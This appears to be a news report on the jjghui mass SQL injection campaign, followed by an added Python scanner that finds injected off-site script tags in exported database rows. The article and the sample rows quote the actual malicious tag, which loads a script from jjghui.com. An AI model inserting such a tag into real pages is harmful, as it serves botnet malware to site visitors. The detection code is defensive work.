So far, 180,000 sites have been penetrated by the new attack, which differs from existing SQL injections like the ones that cracked Sony 17 or 18 times because it attacks not one site at a time, but dozens.
Once they're cracked, the infected sites start serving copies of the malware to their visitors, extending the attack even further.
The attacks started Oct. 9, according to web security provider Armorize, which also found only six of 43 virus detectors can pick up the malicious code.
When a visitor hits an infected site, the page links the browser to a site called jjghui.com, which serves a script that plants botnet-control code on the visitor's machine, giving the botnet owner the ability to run code or make changes on the newly zombified machine.
The injector and subsequent download from jjghui.com appear to be designed to sell fake antivirus software, but the SQL injection makes the site vulnerable to anyone else with enough savvy to run a Google search to identify vulnerable machines and hit them with a different set of exploits, according to Rothacker.
The jjghui attack, named for the site from which it downloads the secondary payload, is owned or controlled by the same person who launched a similar set of attacks, called LizaMoon, last spring. Sites with the name of each exploit are registered to James Northone of Plainview, NY, though the name appears to be an alias and his actual identity is a mystery.
One-line injection, unlimited possibilities
The injected script reads:
<script src=http://jjghui.com/urchin.js> </script>
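Because this attack writes a single `<script src=...>` tag into database fields that the site later renders, a site owner can find infected rows by scanning stored content for script references to hosts that are not their own. The following scanner is an added example written for this article, not code from Armorize or from the article's author; the allowlist, table names and sample rows are constructed for illustration, and the only real indicator in it is the jjghui.com/urchin.js tag quoted above.

```python
import re
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from. Constructed for this example;
# a real deployment would list the site's own domains and approved CDNs.
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# Matches <script ... src=VALUE ...>, with VALUE quoted or unquoted. The injected tag
# in this attack uses an unquoted src, so the pattern must accept both forms.
_SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*([\"']?)([^\"'\s>]+)\1",
    re.IGNORECASE,
)


def external_script_hosts(fragment, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return the hosts of <script src=...> references in an HTML fragment that fall
    outside the allowlist. Relative URLs (no host) are treated as same-origin and skipped."""
    flagged = []
    for _quote, src in _SCRIPT_SRC.findall(fragment):
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            flagged.append(host.lower())
    return flagged


def scan_rows(rows, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Scan (table, id, content) tuples, as exported from a CMS database, and return
    (table, id, host) for each row that references an off-site script."""
    hits = []
    for table, row_id, content in rows:
        for host in external_script_hosts(content, allowed_hosts):
            hits.append((table, row_id, host))
    return hits


# Constructed sample rows standing in for a dump of user-visible text columns.
# Row ("news", 7) carries the one-line injection quoted in the article.
SAMPLE_ROWS = [
    ("product", 101, "Blue widget <b>on sale</b>"),
    ("product", 102, 'Red widget<script src="//cdn.example-shop.test/app.js"></script>'),
    ("news", 7, "Store hours update <script src=http://jjghui.com/urchin.js> </script>"),
    ("news", 8, "Plain text, nothing injected"),
    ("news", 9, '<script src="/static/local.js"></script> Local script, same origin'),
]

if __name__ == "__main__":
    for table, row_id, host in scan_rows(SAMPLE_ROWS):
        print(f"off-site script in {table}#{row_id}: {host}")
```

Run against the sample rows, the scanner reports only the news row carrying the jjghui.com tag; the protocol-relative CDN reference and the same-origin `/static/local.js` pass. In practice the scan should cover every text column the site renders, since the injection writes to whichever columns the vulnerable query reaches, and any hit is a reason to check the site's query code for unparameterized SQL rather than just to delete the row.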